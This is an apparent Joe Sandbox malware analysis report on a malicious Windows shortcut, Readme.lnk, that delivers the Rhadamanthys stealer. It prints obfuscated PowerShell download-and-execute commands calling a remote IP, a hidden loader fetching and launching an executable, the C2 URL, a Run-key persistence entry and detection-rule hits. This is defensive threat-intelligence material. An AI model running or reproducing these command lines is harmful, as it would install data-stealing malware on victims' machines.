Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Readme.lnk.download.lnk

Overview

General Information

Sample name:Readme.lnk.download.lnk
Analysis ID:1568258
MD5:417b5899a759a9291c1d2ae8e3e98032
SHA1:eedc1bba983c8928e8f55ba85acdce50b4305503
SHA256:46d1b27aa5c040327d90c5d9044fceef8825572906065a97d61def0cd3b49a8b
Tags:95-169-201-100Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • cmd.exe (PID: 4588 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5296 cmdline: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7288 cmdline: powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 7468 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\readme.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 7756 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2244 --field-trial-handle=2128,i,2616988406370939895,15394173606116148119,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 123123213123123321132.exe (PID: 2640 cmdline: "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe" MD5: 1C0B92098975DC116DE9C0595D347882)
            • 123123213123123321132.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe" MD5: 1C0B92098975DC116DE9C0595D347882)
              • fontdrvhost.exe (PID: 6304 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 6432 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 5024 cmdline: C:\Windows\system32\WerFault.exe -u -p 6432 -s 140 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 6796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\readme.pdf" MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8080 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2872 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8488 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6404 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8512 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6672 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8524 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 8988 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 9008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7632 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 3368 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2372,i,10103693893264215593,9317882563097270231,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3636 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=2100,i,965329265316757601,16489073601455503628,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3684 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2040,i,9689518798590709034,10875884163289522825,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
{"C2 url": "https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus"}
SourceRuleDescriptionAuthorStrings
0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000001A.00000003.2118974534.0000000000A10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000001A.00000002.2129262237.0000000000CF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000001B.00000003.2123513002.0000000003390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            26.3.123123213123123321132.exe.2ed0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              27.3.fontdrvhost.exe.5800000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                26.3.123123213123123321132.exe.30f0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  26.3.123123213123123321132.exe.2ed0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    26.3.123123213123123321132.exe.2ed0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ProcessId: 4588, ProcessName: cmd.exe
                      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5296, TargetFilename: C:\Users\user\AppData\Local\Temp\loader.bat
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe, ProcessId: 2640, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DiskTuner
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5296, TargetFilename: C:\Users\user\AppData\Local\Temp\loader.bat
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ProcessId: 4588, ProcessName: cmd.exe
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4588, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ProcessId: 5296, ProcessName: powershell.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ProcessId: 4588, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4588, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03), ProcessId: 5296, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7612, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:58:11.179835+010028032742Potentially Bad Traffic192.168.2.44973295.169.201.10018960TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-04T13:58:49.517769+010028548021Domain Observed Used for C2 Detected104.37.175.2327716192.168.2.449785TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://95.169.201.100:18960/uploads/team-1/loader.txtAvira URL Cloud: Label: malware
                      Source: http://95.169.201.100:18960/uploads/team-1/readme.pdfAvira URL Cloud: Label: malware
                      Source: http://95.169.201.100:18960/uploads/team-1/readme.exeAvira URL Cloud: Label: malware
                      Source: 19.2.123123213123123321132.exe.674fd2.1.unpackMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus"}
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeReversingLabs: Detection: 21%
                      Source: Readme.lnk.download.lnkReversingLabs: Detection: 21%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: Readme.lnk.download.lnkJoe Sandbox ML: detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.pdfJump to behavior
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.126.53.17:443 -> 192.168.2.4:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49793 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49852 version: TLS 1.2
                      Source: Binary string: wkernel32.pdb source: 123123213123123321132.exe, 0000001A.00000003.2121502490.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121403543.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127876033.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127990404.0000000005700000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 123123213123123321132.exe, 0000001A.00000003.2120461385.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2120669592.00000000030C0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2125979573.00000000057D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2124888466.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2120966908.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121140629.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127543027.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127086812.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2120461385.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2120669592.00000000030C0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2125979573.00000000057D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2124888466.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 123123213123123321132.exe, 0000001A.00000003.2120966908.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121140629.0000000003070000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127543027.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127086812.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2121763779.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121979217.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128605040.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 123123213123123321132.exe, 0000001A.00000003.2121502490.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2121403543.0000000002ED0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127876033.00000000055E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2127990404.0000000005700000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp31_2_00000289EBE80511

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.37.175.232:7716 -> 192.168.2.4:49785
                      Source: Malware configuration extractorURLs: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus
                      Source: global trafficTCP traffic: 95.169.201.100 ports 18960,1,5,6,8,9,18956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 18956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18956 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49732
                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 95.169.201.100:18956
                      Source: global trafficTCP traffic: 192.168.2.4:49785 -> 104.37.175.232:7716
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesContent-Length: 2764800Content-Type: application/octet-streamLast-Modified: Tue, 03 Dec 2024 09:35:15 GMTDate: Wed, 04 Dec 2024 12:58:10 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 8c c0 ee f9 ed ae bd f9 ed ae bd f9 ed ae bd 7a e5 f1 bd fe ed ae bd 03 ce b7 bd fb ed ae bd ea e5 f3 bd fb ed ae bd 7a e5 f3 bd ee ed ae bd f9 ed af bd 9b ec ae bd 23 ce b2 bd f8 ed ae bd fc e1 f1 bd f8 ed ae bd fc e1 ce bd 90 ec ae bd 15 e6 f0 bd f8 ed ae bd f9 ed ae bd f8 ed ae bd fc e1 f4 bd f8 ed ae bd 52 69 63 68 f9 ed ae bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ee d1 10 43 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 07 0a 00 c0 13 00 00 60 16 00 00 00 00 00 00 c3 0d 00 00 10 00 00 00 d0 13 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 36 00 00 10 00 00 59 10 24 00 02 00 00 04 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 2e 15 00 18 01 00 00 00 80 22 00 a0 fc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 13 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS 